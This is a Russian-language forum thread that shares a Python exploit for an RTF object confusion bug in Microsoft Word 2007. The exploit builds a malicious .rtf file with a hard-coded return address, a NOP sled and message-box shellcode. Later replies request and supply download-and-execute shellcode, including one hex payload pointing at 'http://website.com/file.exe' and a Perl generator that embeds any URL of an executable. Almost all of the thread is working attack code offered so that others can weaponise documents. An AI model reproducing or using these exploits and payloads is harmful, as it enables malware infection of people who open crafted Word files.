Local Microsoft Office Word 2007 RTF Object Confusion

DarckSol · 20.03.2015

Код:

# Title : Microsoft Office Word 2007 - RTF Object Confusion ASLR and DEP bypass
# Date : 28/02/2015
# Author : R-73eN
# Software : Microsoft Office Word 2007
# Tested : Windows 7 Starter
  
  
import sys
# Windows Message Box / all versions . Thanks to Giuseppe D'amore for the shellcode .
shellcode = '31d2b230648b128b520c8b521c8b42088b72208b12807e0c3375f289c703783c8b577801c28b7a2001c731ed8b34af01c645813e4661746175f2817e084578697475e98b7a2401c7668b2c6f8b7a1c01c78b7caffc01c76879746501686b656e42682042726f89e1fe490b31c05150ffd7'
#filecontent
content="{\\rtf1"
content+="{\\fonttbl{\\f0\\fnil\\fcharset0Verdana;}}"
content+="\\viewkind4\\uc1\\pard\\sb100\\sa100\\lang9\\f0\\fs22\\par"
content+="\\pard\\sa200\\sl276\\slmult1\\lang9\\fs22\\par"
content+="{\\object\\objocx"
content+="{\\*\\objdata"
content+="\n"
content+="01050000020000001B0000004D53436F6D63746C4C69622E4C697374566965774374726C2E320000"
content+="00000000000000000E0000"
content+="\n"
content+="D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF09000600000000000000"
content+="00000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFFFEFFFFFF"
content+="FEFFFFFF0400000005000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E007400"
content+="72007900000000000000000000000000000000000000000000000000000000000000000000000000"
content+="000000000000000016000500FFFFFFFFFFFFFFFF020000004BF0D1BD8B85D111B16A00C0F0283628"
content+="0000000062eaDFB9340DCD014559DFB9340DCD0103000000000600000000000003004F0062006A00"
content+="49006E0066006F000000000000000000000000000000000000000000000000000000000000000000"
content+="0000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000600000000000000"
content+="03004F00430058004E0041004D004500000000000000000000000000000000000000000000000000"
content+="000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF"
content+="00000000000000000000000000000000000000000000000000000000000000000000000001000000"
content+="160000000000000043006F006E00740065006E007400730000000000000000000000000000000000"
content+="000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFF"
content+="FFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000"
content+="00000000020000007E05000000000000FEFFFFFFFEFFFFFF03000000040000000500000006000000"
content+="0700000008000000090000000A0000000B0000000C0000000D0000000E0000000F00000010000000"
content+="11000000120000001300000014000000150000001600000017000000FEFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFF0092030004000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000004C00690073007400"
content+="56006900650077004100000000000000000000000000000000000000000000000000000000000000"
content+="0000000000000000000000000000000021433412080000006ab0822cbb0500004E087DEB01000600"
content+="1C000000000000000000000000060001560A000001EFCDAB00000500985D65010700000008000080"
content+="05000080000000000000000000000000000000001FDEECBD01000500901719000000080000004974"
content+="6D736400000002000000010000000C000000436F626A640000008282000082820000000000000000"
content+="000000000000"
content+= 'cb818278'# Address=788281CB jmp esp |  {PAGE_EXECUTE_READ} [msxml5.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.20.1072.0 (C:\Program Files\Common Files\Microsoft Shared\OFFICE11\msxml5.dll)
content+="9090909090909090" #nops
content+= shellcode
#junk
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000"
content+="\n"
content+="}"
content+="}"
content+="}"
banner = "\n\n"
banner +="  ___        __        ____                   _    _  \n"
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __        / \  | |    \n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \      / _ \ | |    \n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |    / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_|[] /_/   \_\_____|\n\n"
print banner
if(len(sys.argv) < 2):
    print '\n Usage : exploit.py filename.rtf'
else:
    filename = sys.argv[1]
    f=open(filename,"w")
    f.write(content)
    f.close()
    print '\n[ + ] File ' + sys.argv[1] + ' created [ + ]\n'

Mmka · 02.04.2015

# Windows Message Box / all versions . Thanks to Giuseppe D'amore for the shellcode .
shellcode = & #39;31d2b230648b128b520c8b521c8b42088b72208b12807e0c3375f289c703783c8b577801c28b
7a2001c731ed8b34af01c645813e4661746175f2817e084578697475e98b7a2401c7668b2c6f8b7a
1c01c78b7caffc01c76879746501686b656e42682042726f89e1fe490b31c05150ffd7'

У кого под рукой скиньте шеллкод download & execute для этого rtf

Если есть то лучше вот от этих:
http://1337day.com/exploit/description/23166
http://1337day.com/exploit/description/23167

Mmka · 04.04.2015

У меня так и не заработал. Даже на ворде 2007 без сервис паков. Везде ошибка памяти.

NOD его видит вообще как сплойт 2012 года

DarckSol · 07.04.2015

Код:

shellcode[] =

"\xEB\x50\x31\xF6\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x6E"

"\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B\x4B\x18\x67"

"\xE3\xEC\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31\xC0\x99"

"\x02\x17\xC1\xCA\x04\xAE\x75\xF8\x3B\x54\x24\x04\xE0\xE4\x75\xCE"

"\x8B\x53\x24\x01\xEA\x0F\xB7\x14\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C"

"\x97\xC3\x68\x8E\x48\x8B\x63\xE8\xA6\xFF\xFF\xFF\x66\xB8\x6C\x6C"

"\x50\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C\x6D\x54\xFF\xD5\x68\x83"

"\x2B\x76\xF6\xE8\x8A\xFF\xFF\xFF\xEB\x21\x50\xFF\xD5\x68\xE7\xC4"

"\xCC\x69\xE8\x7B\xFF\xFF\xFF\x50\x4C\x4C\x4C\x4C\xFF\xD5\x68\x77"

"\xA6\x60\x2A\xE8\x6A\xFF\xFF\xFF\x50\xFF\xD5\x50\x68\x2E\x65\x78"

"\x65\x68\x43\x3A\x5C\x78\x50\x50\x89\xE3\x80\xC3\x08\x53\xE8\xC7"

"\xFF\xFF\xFFhttp://website.com/file.exe";

Хотя меня терзают сомнения, что это заработает

-----------------------------------------------------------

Код:

#!/usr/bin/perl

$loading_url=$ARGV[0];
chomp ($loading_url);
my @buffer;

if ($loading_url eq "") {
$sco = 'ERROR!!! Enter url to remote exe.';
buffer_gen($sco);
print @buffer;
exit;
}

$c= generate_char(0);

$sco= "\xE8\x56\x00\x00\x00\x53\x55\x56\x57\x8B\x6C\x24\x18\x8B\x45".
      "\x3C\x8B\x54\x05\x78\x01\xEA\x8B\x4A\x18\x8B\x5A\x20\x01\xEB".
      "\xE3\x32\x49\x8B\x34\x8B\x01\xEE\x31\xFF\xFC\x31\xC0\xAC\x38".
      "\xE0\x74\x07\xC1\xCF\x0D\x01\xC7\xEB\xF2\x3B\x7C\x24\x14\x75".
      "\xE1\x8B\x5A\x24\x01\xEB\x66\x8B\x0C\x4B\x8B\x5A\x1C\x01\xEB".
      "\x8B\x04\x8B\x01\xE8\xEB\x02\x31\xC0\x5F\x5E\x5D\x5B\xC2\x08".
      "\x00\x5E\x6A\x30\x59\x64\x8B\x19\x8B\x5B\x0C\x8B\x5B\x1C\x8B".
      "\x1B\x8B\x5B\x08\x53\x68\x8E\x4E\x0E\xEC\xFF\xD6\x89\xC7\x53".
      "\x68\x8E\x4E\x0E\xEC\xFF\xD6\xEB\x50\x5A\x52\xFF\xD0\x89\xC2".
      "\x52\x52\x53\x68\xAA\xFC\x0D\x7C\xFF\xD6\x5A\xEB\x4D\x59\x51".
      "\x52\xFF\xD0\xEB\x72\x5A\xEB\x5B\x59\x6A\x00\x6A\x00\x51\x52".
      "\x6A\x00\xFF\xD0\x53\x68\xA0\xD5\xC9\x4D\xFF\xD6\x5A\x52\xFF".
      "\xD0\x53\x68\x98\xFE\x8A\x0E\xFF\xD6\xEB\x44\x59\x6A\x00\x51".
      "\xFF\xD0\x53\x68\x7E\xD8\xE2\x73\xFF\xD6\x6A\x00\xFF\xD0\xE8".
      "\xAB\xFF\xFF\xFF\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00".
      "\xE8\xAE\xFF\xFF\xFF\x55\x52\x4C\x44\x6F\x77\x6E\x6C\x6F\x61".
      "\x64\x54\x6F\x46\x69\x6C\x65\x41\x00\xE8\xA0\xFF\xFF\xFF\x2E".
      "\x2E\x5C".$c."\x00\xE8\xB7\xFF\xFF\xFF\x2E\x2E\x5C".$c."\x00".
      "\xE8\x89\xFF\xFF\xFF".$loading_url."\x00";

$sco=convert_sco($sco);
buffer_gen($sco);
print @buffer;

sub generate_char()
{
 my $wdsize = shift;
 my @alphanumeric = ('a'..'z');
 my $wd = join '',
 map $alphanumeric[rand @alphanumeric], 0..$wdsize;
  return $wd;
}

sub convert_sco {
        my $data = shift;
        my $mode = shift() || 'LE';
        my $code = '';

        my $idx = 0;

        if (length($data) % 2 != 0) {
                $data .= substr($data, -1, 1);
        }

        while ($idx < length($data) - 1) {
                my $c1 = ord(substr($data, $idx, 1));
                my $c2 = ord(substr($data, $idx+1, 1));
                if ($mode eq 'LE') {
                        $code .= sprintf('%%u%.2x%.2x', $c2, $c1);
                } else {
                        $code .= sprintf('%%u%.2x%.2x', $c1, $c2);
                }
                $idx += 2;
        }

        return $code;
}

sub buffer_gen(){
$sco = shift;
@buffer=<<FX;

    Win32 Download and Execute Shellcode Generator (browsers edition)
    Size: 275 bytes + loading_url
    Author: Yag Kohha (skyhole [at] gmail.com)
    
    Usage: ./sco http://remote_server/loader.exe
    
    Greetz to:
     str0ke \& milw0rm project
     shinnai
     h07
     rgod
     H.D. Moor \& Metaspl0it
     offtopic
     3APA3A
    
-------> Start

$sco

-------> End
FX

}

Как вариант....

И еще вариант

Local Microsoft Office Word 2007 RTF Object Confusion

DarckSol

(L1) cache

Mmka

floppy-диск

Mmka

floppy-диск

DarckSol

(L1) cache